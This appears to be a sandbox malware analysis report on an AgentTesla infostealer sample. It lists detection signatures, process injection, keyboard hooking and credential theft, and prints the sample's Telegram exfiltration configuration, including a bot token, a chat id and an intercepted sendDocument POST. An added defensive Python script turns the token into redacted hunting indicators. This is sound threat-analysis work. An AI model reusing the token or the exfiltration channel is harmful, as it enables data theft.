Windows Analysis Report
SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.5438 (renamed file extension from 5438 to exe)
Analysis ID: 620228
MD5: 5d5f37a7cf3a9ff4277b3a9dc2c4b9d2
SHA1: 1a115c8a1761ef2a2cf61d854d1d2c201c902d53
SHA256: 31941c96fa470de35d08fd8bdc215c2ff2cbeb82dd72e91aafa563c08af7c969
Tags: exe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
.NET source code references suspicious native API functions
Modifies the hosts file
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
Contains functionality to register a low level keyboard hook
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains very large array initializations
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Binary contains a suspicious time stamp
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

(classification chart not reproduced in text)

Process Tree

  • System is w10x64
  • ykVBUY.exe (PID: 5256 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 1408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • ykVBUY.exe (PID: 2976 cmdline: "C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe" MD5: D621FD77BD585874F9686D3A76462EF1)
    • conhost.exe (PID: 3264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Telegram RAT: {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
AgentTesla: {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000000.00000002.319389781.000000000355E000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AntiVM_3 | Yara detected AntiVM_3 | Joe Security |
00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
(table truncated: 22 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
9.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
9.2.MSBuild.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
9.2.MSBuild.exe.400000.0.unpack | MALWARE_Win_AgentTeslaV3 | AgentTeslaV3 infostealer payload | ditekSHen | 0x32e84:$s10: logins; 0x328eb:$s11: credential; 0x2ed14:$g1: get_Clipboard; 0x2ed22:$g2: get_Keyboard; 0x2ed2f:$g3: get_Password; 0x300eb:$g4: get_CtrlKeyDown; 0x300fb:$g5: get_ShiftKeyDown; 0x3010c:$g6: get_AltKeyDown
9.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
9.0.MSBuild.exe.400000.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
(table truncated: 25 entries in total)

Sigma Overview

No Sigma rule has matched

Snort Overview

No Snort rule has matched

AV Detection

Source: 9.0.MSBuild.exe.400000.4.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.6260.0.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | ReversingLabs: Detection: 26%
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Joe Sandbox ML: detected
Source: 9.0.MSBuild.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.MSBuild.exe.400000.1.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.MSBuild.exe.400000.3.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.MSBuild.exe.400000.2.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.2.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 9.0.MSBuild.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: ykVBUY.exe, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 00000009.00000003.348393715.00000000061F1000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, ykVBUY.exe, 0000000E.00000002.360927435.0000000000552000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe, 00000010.00000002.380383658.0000000000602000.00000002.00000001.01000000.0000000C.sdmp, ykVBUY.exe.9.dr

Networking

Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
    Host: api.telegram.org
    Content-Length: 754
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 443 in both directions with client ports 49717, 49741, 49743, 49748, 49768
Source: unknown | TCP traffic detected without corresponding DNS query: 131.253.33.200 (12 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 40.126.31.4 (12 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 93.184.220.29 (10 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 8.248.119.254 (7 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 67.26.81.254 (2 occurrences)
Source: unknown | TCP traffic detected without corresponding DNS query: 13.248.245.213
Source: unknown | TCP traffic detected without corresponding DNS query: 142.250.203.110
(Connections with no preceding DNS query are not attributed to a process in this view; confirm them against the PCAP before adding these addresses to an indicator list. The only destination tied to the sample's own behaviour above is api.telegram.org / 149.154.167.220.)
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory: http://127.0.0.1:HTTP/1.1; http://DynDns.comDynDNSnamejidpasswordPsi/Psi; http://UhwhaG.com
Source: MSBuild.exe, 00000009.00000002.529774217.00000000031DB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
Source: MSBuild.exe, 00000009.00000003.443692265.00000000061F2000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.530694770.00000000061F2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.324950723.00000000074A2000.00000004.00000800.00020000.00000000.sdmp | Strings found in binary or memory (font-foundry metadata carried by embedded fonts, not C2 infrastructure): http://fontfabrik.com; http://www.apache.org/licenses/LICENSE-2.0; http://www.carterandcone.coml; http://www.fontbureau.com; http://www.fontbureau.com/designers; http://www.fontbureau.com/designers/?; http://www.fontbureau.com/designers/cabarga.htmlN; http://www.fontbureau.com/designers/frere-user.html; http://www.fontbureau.com/designers8; http://www.fontbureau.com/designers?; http://www.fontbureau.com/designersG; http://www.fonts.com; http://www.founder.com.cn/cn; http://www.founder.com.cn/cn/bThe; http://www.founder.com.cn/cn/cThe; http://www.galapagosdesign.com/DPlease; http://www.galapagosdesign.com/staff/dennis.htm; http://www.goodfont.co.kr; http://www.jiyu-kobo.co.jp/; http://www.sajatypeworks.com; http://www.sakkal.com; http://www.sandoll.co.kr; http://www.tiro.com; http://www.typography.netD; http://www.urwpp.deDPlease; http://www.zhongyicts.com.cn
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322233930.0000000004710000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322403538.00000000047FA000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000002.524548003.0000000000402000.00000040.00000400.00020000.00000000.sdmp, MSBuild.exe, 00000009.00000000.310999975.0000000000402000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument----- (adjacent string literals run together in the dump)
Source: MSBuild.exe, 00000009.00000002.529747122.00000000031C6000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org4
Source: MSBuild.exe, 00000009.00000002.528471132.0000000002E81000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www
Source: unknown | HTTP traffic detected:
    POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8da2ddf8401560c
    Host: api.telegram.org
    Content-Length: 754
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49768 version: TLS 1.2

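The configuration extractor output, the memory strings and the intercepted POST above all carry the same Telegram bot token, which is the only indicator in this report that is specific to this campaign. The script below is an added example, not part of the Joe Sandbox report or of AgentTesla itself: it pulls Bot API tokens, method names and chat ids out of report text or a strings dump, tolerates the fused literals a memory dump produces (the `.../sendDocumentdocument-----` string above), and turns the result into hunting indicators with the secret redacted. The input is constructed from the strings shown in this report; the function names, the `{30,}` minimum secret length and the method list (sendMessage and sendDocument are the two seen here; sendPhoto, getMe and getUpdates are added from the public Bot API) are my assumptions.

```python
"""Added example: turn the Telegram C2 artefacts of an AgentTesla report into
hunting indicators. Not Joe Sandbox or AgentTesla code; the input below is
constructed from the strings shown in the report and no network I/O is done."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Telegram Bot API paths have the form /bot<bot_id>:<secret>/<method>.
# <bot_id> is the numeric, non-secret part; <secret> grants full control of the
# bot (anyone holding it can call getUpdates and read the exfiltrated data).
# Memory strings run adjacent literals together (the report shows
# ".../sendDocumentdocument-----"), so the method is matched against known Bot
# API method names rather than a greedy [A-Za-z]+ (method list is an assumption).
METHODS = "sendMessage|sendDocument|sendPhoto|getMe|getUpdates"
BOT_PATH_RE = re.compile(
    rf"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{{30,}})(?:/(?P<method>{METHODS}))?"
)
# Chat ids only appear in the extracted configuration, not in the URL.
CHAT_ID_RE = re.compile(r'"Chat id":\s*"(?P<chat_id>-?\d+)"')


@dataclass
class TelegramIOC:
    bot_id: str
    secret: str
    methods: set[str] = field(default_factory=set)
    chat_ids: set[str] = field(default_factory=set)

    @property
    def redacted_token(self) -> str:
        """Form safe to paste into a ticket: bot id in clear, secret mostly hidden."""
        return f"{self.bot_id}:{self.secret[:4]}...{self.secret[-4:]}"


def extract(text: str) -> dict[str, TelegramIOC]:
    """Collect tokens, methods and chat ids from report text, strings output or
    proxy request lines. Keyed by bot id so repeated sightings merge."""
    iocs: dict[str, TelegramIOC] = {}
    for line in text.splitlines():
        seen_here = []
        for m in BOT_PATH_RE.finditer(line):
            ioc = iocs.setdefault(m["bot_id"], TelegramIOC(m["bot_id"], m["secret"]))
            if m["method"]:
                ioc.methods.add(m["method"])
            seen_here.append(ioc)
        # A chat id on the same line as a token belongs to that bot.
        for c in CHAT_ID_RE.finditer(line):
            for ioc in seen_here:
                ioc.chat_ids.add(c["chat_id"])
    return iocs


def hunting_indicators(ioc: TelegramIOC) -> dict[str, str]:
    """What can actually be matched on a network, and how strong each item is."""
    return {
        # Seen in DNS and TLS SNI, but api.telegram.org is also used legitimately.
        "dns_or_sni": "api.telegram.org",
        # Only visible where TLS is inspected (the sandbox intercepts it); the
        # bot id alone is enough to match without copying the secret into rules.
        "uri_prefix": f"/bot{ioc.bot_id}:",
        "methods": ",".join(sorted(ioc.methods)),
        "chat_ids": ",".join(sorted(ioc.chat_ids)),
        "token": ioc.redacted_token,
    }


# Constructed from the strings in the report: two config-extractor lines, a fused
# memory string and the intercepted request line.
SAMPLE = """\
{"C2 url": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendMessage"}
{"Exfil Mode": "Telegram", "Chat id": "1131810225", "Chat URL": "https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument"}
https://api.telegram.org/bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocumentdocument-----
POST /bot1698102386:AAHWYbuf-rLmgfOsAgCnA_t8ncjPXSF5S8c/sendDocument HTTP/1.1
"""

if __name__ == "__main__":
    for ioc in extract(SAMPLE).values():
        for k, v in hunting_indicators(ioc).items():
            print(f"{k:12} {v}")
```

On a production network the `uri_prefix` indicator only fires where TLS to api.telegram.org is inspected; without that, the observable is DNS/SNI for api.telegram.org plus the JA3 value the report lists, both of which also match legitimate Telegram clients and so need to be combined with the process context (here MSBuild.exe making the connection).
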
Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_0687B0F8 SetWindowsHookExW 0000000D,00000000,?,? (idHook 0x0D is WH_KEYBOARD_LL, a low-level keyboard hook that receives every keystroke on the desktop)
Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.316437923.000000000162B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Window created: window name: CLIPBRDWNDCLASS

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File written: C:\Windows\System32\drivers\etc\hosts

                    System Summary

                    barindex
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                    Source: 9.0.MSBuild.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: 9.0.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007bE1A600D2u002dF5A3u002d4320u002dA658u002d390D97B8B6B8u007d/u0037EDCC754u002d59E4u002d4EB9u002dBAC0u002dED1F3A681E9E.csLarge array initialization: .cctor: array initializer size 11729
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                    Source: 9.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.4847b50.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 0.2.SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe.48a8b70.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: 9.0.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_0325C344
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_0325E760
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_0325E770
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_07CA0040
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Code function: 0_2_07CA0021
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_0121F400
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_0121F748
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D6678
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067D5C88
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067DBB18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067DCF08
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067DBD38
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FC640
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F62F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FDEA0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F3F58
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067FAF18
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F03D8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F7918
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F0374
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_067F4405
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_068745E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_068722D4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_068757A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_06876490
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_06870040
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 9_2_06872B80
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 14_2_00D118C0
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 14_2_00D151F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 14_2_00D12370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 14_2_00D128A9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 16_2_028B2370
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 16_2_028B51F9
                    Source: C:\Users\user\AppData\Roaming\ykVBUY\ykVBUY.exe | Code function: 16_2_028B1A2F
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe | Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322518240.0000000004891000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
                    Source: SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe, 00000000.00000002.322647809.00000000048F2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameLepqEZpPxHlpofwnoTlOFMwRRcJkmnsaAyjbPwx.exeH vs SecuriteInfo.com.Trojan.MSIL.AgentTesla.ERQ.MTB.14730.exe
